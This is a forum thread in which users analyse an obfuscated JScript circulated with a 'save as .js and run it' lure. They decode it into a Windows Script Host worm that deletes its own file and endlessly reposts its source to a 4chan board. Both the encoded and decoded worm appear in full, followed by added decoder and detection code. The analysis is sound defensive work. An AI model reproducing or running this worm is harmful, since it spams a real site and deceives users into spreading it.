
View Full Version : [JS] Weird script... :S



bulld0z3r
08-31-2008, 07:58 PM
I've been browsing the internet and found this script:



nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n"+
"7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ"+
"|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n"+
"7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n"+
"8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n"+
"9l8]C6252==WX\r\n"+
"8]4=@D6WX\r\n"+
"7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\n"+
"IlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O"+
"7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO"+
"3C:4<D]-C-?-C-?QZ9\r\n"+
"2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\n"+
"H9:=6W`XL\r\n"+
"2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n"+
"2]D6?5WX\r\n"+
"3l2]C6DA@?D6E6IE\r\n"+
"4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n"+
"5lQQ\r\n"+
"6lQQ\r\n"+
"7@CW:l_j:ka_j:ZZX5ZlCWX\r\n"+
"7@CW:l_j:kgj:ZZX6ZlCWX\r\n"+
"2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\n"+
"ElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n"+
"2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n"+
"2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\n"+
"Qa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\n"+
"Qr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\Q"+
"Z5ZQ-C-?QZ\r\n"+
"<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n"+
"($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN"
e=eval
e('vv="";for(i=0;i<nm.len'+'gth;i++){;if(nm.charA'+
't(i)=="\\r")vv+="\\r";e'+'lse if(nm.cha'+'rAt(i'+
')=="\\n'+'")vv+="\\n";el'+'se vv+=String.fromCh'+
'arCode((nm.ch'+
'arC'+'odeAt(i)-32+47)%94+32)};ev'+
'al(vv);');;;;;;;;;;;


The guys who posted it also wrote that:


COPY POSTED SCRIPT TO NOTEPAD AND SAVE THE FILE AS .JS AND THAN RUN IT...


what will happen?

Philip M
09-01-2008, 08:29 AM
COPY POSTED SCRIPT TO NOTEPAD AND SAVE THE FILE AS .JS AND THEN RUN IT...

what will happen?


I'll give you three guesses, but I would expect that your computer will be infected with a malicious virus or trojan. The eval() function evaluates a string and executes it as if it was script code. In this case the string is encrypted. Or perhaps nothing will happen. Suggest you try it and post back (if your computer is still working).


Press any key to continue or any other key to quit

Mikebert4
09-01-2008, 07:06 PM
What you have there is encrypted Javascript.

Some Source-code protection programs allow you to encrypt the javascript source into (effectively) trash, hence stopping the majority of people from viewing the source.

I'd say that's what's happened here - though as bulld0z3r said - beware of hidden code like that as it can pull all sorts of rubbish to your PC.

Millenia
09-01-2008, 07:11 PM
into (effectively) trash

Decoding things like this is usually incredibly easy.

liorean
09-01-2008, 11:08 PM
Decoding isn't hard. First, simply merge the split strings.

nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n9l8]C6252==WX\r\n8]4=@D6WX\r\n7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\nIlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO3C:4<D]-C-?-C-?QZ9\r\n2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\nH9:=6W`XL\r\n2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n2]D6?5WX\r\n3l2]C6DA@?D6E6IE\r\n4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n5lQQ\r\n6lQQ\r\n7@CW:l_j:ka_j:ZZX5ZlCWX\r\n7@CW:l_j:kgj:ZZX6ZlCWX\r\n2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\nElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\nQa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\nQr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN";
e=eval;
e('vv="";for(i=0;i<nm.length;i++){;if(nm.charAt(i)=="\\r")vv+="\\r";else if(nm.charAt(i)=="\\n")vv+="\\n";else vv+=String.fromCharCode((nm.charCodeAt(i)-32+47)%94+32)};eval(vv);');
Okay, then take the eval part and replace it with the code that is being run in it:

nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n9l8]C6252==WX\r\n8]4=@D6WX\r\n7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\nIlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO3C:4<D]-C-?-C-?QZ9\r\n2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\nH9:=6W`XL\r\n2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n2]D6?5WX\r\n3l2]C6DA@?D6E6IE\r\n4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n5lQQ\r\n6lQQ\r\n7@CW:l_j:ka_j:ZZX5ZlCWX\r\n7@CW:l_j:kgj:ZZX6ZlCWX\r\n2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\nElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\nQa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\nQr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN";
e=eval;
vv="";
for(i=0;i<nm.length;i++){
if(nm.charAt(i)=="\r")
vv+="\r";
else if(nm.charAt(i)=="\n")
vv+="\n";
else
vv+=String.fromCharCode((nm.charCodeAt(i)-32+47)%94+32)
};
eval(vv);

The code should be pretty self-explanatory by now, but to be brief, vv ends up being the result of doing a rot47 on the sequence of 94 characters that start at whitespace (U+0020) - as well as preserving any line feeds (U+000A) and carriage returns (U+000D) - in the original variable nm.

The result of replacing the eval(vv); with its code is the following:
k="Content-Disposition: form-data; name="

function r(){return String.fromCharCode("a".charCodeAt(0)+Math.floor(Math.random()*26))}

f=WSH.createobject("scripting.filesystemobject")

g=f.opentextfile(WSH.scriptfullname)

h=g.readall()

g.close()

f.deletefile(WSH.scriptfullname)

x="Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and **** bricks.\r\n\r\n"+h

a=WSH.createobject("msxml2.xmlhttp")

while(1){

a.open("get","http://img.4chan.org/b",0)

a.send()

b=a.responsetext

c=b.substr(b.indexOf("res/")+4,8)

d=""

e=""

for(i=0;i<20;i++)d+=r()

for(i=0;i<8;i++)e+=r()

a.open("post","http://dat.4chan.org/b/imgboard.php",0)

t="multipart/form-data; boundary="+d

a.setrequestheader("Content-Type",t)

a.send("--"+d+"\r\n"+k+"\"MAX_FILE_SIZE\"\r\n\r\n"+

"2097152\r\n--"+d+"\r\n"+

k+"\"resto\"\r\n\r\n"+c+"\r\n--"+d+"\r\n"+

k+"\"name\"\r\n\r\n\r\n--"+d+"\r\n"+

k+"\"email\"\r\n\r\n\r\n--"+d+"\r\n"+

k+"\"sub\"\r\n\r\n\r\n--"+d+"\r\n"+

k+"\"com\"\r\n\r\n"+x+"\r\n--"+d+"\r\n"+

k+"\"upfile\"; filename=\"\"\r\n"+

"Content-Type: application/octet-stream\r\n\r\n\r\n--"+d+"\r\n"+

k+"\"pwd\"\r\n\r\n"+e+"\r\n--"+d+"\r\n"+

k+"\"mode\"\r\n\r\nregist\r\n--"+d+"--\r\n")

WSH.sleep(3e4+Math.floor(Math.random()*3e4))}
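
The two steps from the post above (merge the split strings, then apply the decoding loop), done purely as text processing with no eval(); this is an added example, not code from the thread. The function names and the out-of-window guard are additions, and the sample is two pieces copied from the posted nm string. The comparison at the end shows the one place this cipher departs from textbook ROT47: here "O" and the space swap, so a stock ROT47 tool turns every decoded space into "~".

```javascript
// Added example: static decode of the posted script. Nothing is eval()'d.

// Step 1 from the post: merge the "..."+ pieces of the nm assignment.
// Each piece is parsed as data with JSON.parse, which understands the only
// escapes this payload uses (\\, \r, \n) and throws on anything else.
function mergeStringLiterals(assignmentSource) {
  const pieces = assignmentSource.match(/"(?:[^"\\]|\\.)*"/g) || [];
  return pieces.map((p) => JSON.parse(p)).join("");
}

// Step 2: the loop from the eval'd string, returning text instead of running it.
// The window is the 94 code points U+0020..U+007D.
function decodePageCipher(text) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    const code = text.charCodeAt(i);
    if (code < 32 || code > 125) {
      out += text.charAt(i); // CR, LF and anything outside the window (added guard)
    } else {
      out += String.fromCharCode((code - 32 + 47) % 94 + 32);
    }
  }
  return out;
}

// Textbook ROT47 uses U+0021..U+007E instead, for comparison.
function stockRot47(text) {
  return text.replace(/[!-~]/g, (ch) =>
    String.fromCharCode(33 + ((ch.charCodeAt(0) - 33 + 47) % 94)));
}

// Two pieces of the nm assignment as posted (String.raw keeps the
// backslashes exactly as they appear in the .js file).
const SAMPLE_SOURCE = String.raw`nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n"+
"8]4=@D6WX\r\n"`;

function decodeSample() {
  return decodePageCipher(mergeStringLiterals(SAMPLE_SOURCE));
}

console.log(JSON.stringify(decodeSample()));
console.log(decodePageCipher("iO7@C>"), "|", stockRot47("iO7@C>"));
```

Because 47 is half of 94, the same function also re-encodes: applying decodePageCipher twice returns the input.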

Philip M
09-02-2008, 09:13 AM
And it actually does - what?

liorean
09-02-2008, 04:31 PM
Well, let's see. It's designed to be run in the Windows Scripting Host. (Which is the default behaviour when opening .js files on Windows, which I find hilarious considering that writing .js files for homepages must be many times more usual than writing windows scripts.)
f=WSH.createobject("scripting.filesystemobject");
g=f.opentextfile(WSH.scriptfullname);
h=g.readall();
g.close();
f.deletefile(WSH.scriptfullname);

This part reads the content of the file (the OP's source code, that is) into the variable h and then deletes that file.



a=WSH.createobject("msxml2.xmlhttp");
while(1){
a.open("get","http://img.4chan.org/b",0);
a.send();
b=a.responsetext;
c=b.substr(b.indexOf("res/")+4,8);

This part seems to mine a certain string out of a 4chan page.



d="";
e="";
for(i=0;i<20;i++)d+=r();
for(i=0;i<8;i++)e+=r();
a.open("post","http://dat.4chan.org/b/imgboard.php",0);
t="multipart/form-data; boundary="+d;
a.setrequestheader("Content-Type",t);
a.send("--"+d+"\r\n"+k+"\"MAX_FILE_SIZE\"\r\n\r\n"+
"2097152\r\n--"+d+"\r\n"+
k+"\"resto\"\r\n\r\n"+c+"\r\n--"+d+"\r\n"+
k+"\"name\"\r\n\r\n\r\n--"+d+"\r\n"+
k+"\"email\"\r\n\r\n\r\n--"+d+"\r\n"+
k+"\"sub\"\r\n\r\n\r\n--"+d+"\r\n"+
k+"\"com\"\r\n\r\n"+x+"\r\n--"+d+"\r\n"+
k+"\"upfile\"; filename=\"\"\r\n"+
"Content-Type: application/octet-stream\r\n\r\n\r\n--"+d+"\r\n"+
k+"\"pwd\"\r\n\r\n"+e+"\r\n--"+d+"\r\n"+
k+"\"mode\"\r\n\r\nregist\r\n--"+d+"--\r\n");
This part seems to generate a random username and password and try to post the message the OP had seen to 4chan.




WSH.sleep(3e4+Math.floor(Math.random()*3e4));
}

And this part puts the script process to sleep after each try at posting, after which it will resume that infinite loop that started with the while(1){ above.
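
The behaviours walked through in the post above, turned into a static triage check for decoded Windows Script Host JScript; this is an added example, not code from the thread. The rule names, the "selfPropagating" heuristic and both sample scripts (with an example.invalid URL) are constructed for illustration. Input is treated as text only and never executed.

```javascript
// Added example: flag the behaviours described above in decoded WSH JScript.
const RULES = [
  { id: "filesystem-com-object", re: /createobject\s*\(\s*"scripting\.filesystemobject"/i },
  { id: "reads-own-source", re: /opentextfile\s*\(\s*WSH\.scriptfullname/i },
  { id: "deletes-own-file", re: /deletefile\s*\(\s*WSH\.scriptfullname/i },
  { id: "http-com-object", re: /createobject\s*\(\s*"msxml2\.xmlhttp"/i },
  { id: "http-post", re: /\.open\s*\(\s*"post"/i },
  { id: "endless-loop", re: /while\s*\(\s*(1|true)\s*\)/i },
  { id: "sleep-between-rounds", re: /WSH\.sleep\s*\(/i },
];

function triage(scriptText) {
  const behaviours = RULES.filter((r) => r.re.test(scriptText)).map((r) => r.id);
  const urls = [...new Set(scriptText.match(/https?:\/\/[^\s"']+/gi) || [])];
  // Heuristic (assumption): a script that reads its own source and also
  // POSTs over HTTP is treated as likely to be re-publishing itself.
  const selfPropagating =
    behaviours.includes("reads-own-source") && behaviours.includes("http-post");
  return { behaviours, urls, selfPropagating };
}

// Constructed sample shaped like the decoded script in this thread.
const SUSPECT_SAMPLE = [
  'f=WSH.createobject("scripting.filesystemobject")',
  'g=f.opentextfile(WSH.scriptfullname)',
  'h=g.readall()',
  'f.deletefile(WSH.scriptfullname)',
  'a=WSH.createobject("msxml2.xmlhttp")',
  'while(1){',
  'a.open("post","http://board.example.invalid/post.php",0)',
  'a.send(h)',
  'WSH.sleep(3e4)}',
].join("\r\n");

// Constructed benign admin script: touches the filesystem object, nothing else.
const BENIGN_SAMPLE =
  'var fso = WSH.CreateObject("Scripting.FileSystemObject");\n' +
  'WSH.Echo(fso.GetTempName());';

console.log(triage(SUSPECT_SAMPLE));
console.log(triage(BENIGN_SAMPLE));
```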


